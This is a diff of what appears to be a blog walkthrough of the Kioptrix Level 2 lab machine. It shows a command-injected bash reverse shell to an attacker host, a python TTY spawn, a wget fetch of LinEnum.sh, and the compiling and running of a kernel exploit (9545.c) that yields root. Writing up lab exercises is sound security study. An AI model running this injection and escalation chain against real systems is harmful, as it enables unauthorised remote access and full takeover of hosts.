HNTLY/HNTLY.github.io/_posts/2020-08-12-Kioptrix-Level2.md

  I entered `x.x.x.4 | bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1` into the website and we get reverse shell on our local machine as user apache

- Spawn a TTY shell using python -c 'import pty; pty.spawn("/bin/sh")' from (Netsec TTY Cheat Sheet)[https://netsec.ws/?p=337]
+ Spawn a TTY shell using `python -c 'import pty; pty.spawn("/bin/sh")'` from (Netsec TTY Cheat Sheet)[https://netsec.ws/?p=337]

 ### Privilege Escalation

-I started
+I started a python web server `python3 -m http.server` in my directory containing LinEnum.sh

+`cd /tmp` and `wget http://x.x.x.49:8000/LinEnum.sh` to get the script onto the target and `chmod 700 LinEnum.sh` to be able to run it.

+This gets us important system information such as CentOS release 4.5 (Final) and Linux version 2.6.9-55

+`searchsploit linux kernel 2.6 centos` suggests we can use the `9545.c` exploit

+To upload to the target machine, we use the same python webserver method as before

+`gcc -o exploit 9545.c`

+`chmod 700 exploit`

+`./exploit`

+`uid=0(root) gid=0(root) groups=48(apache)` and we are root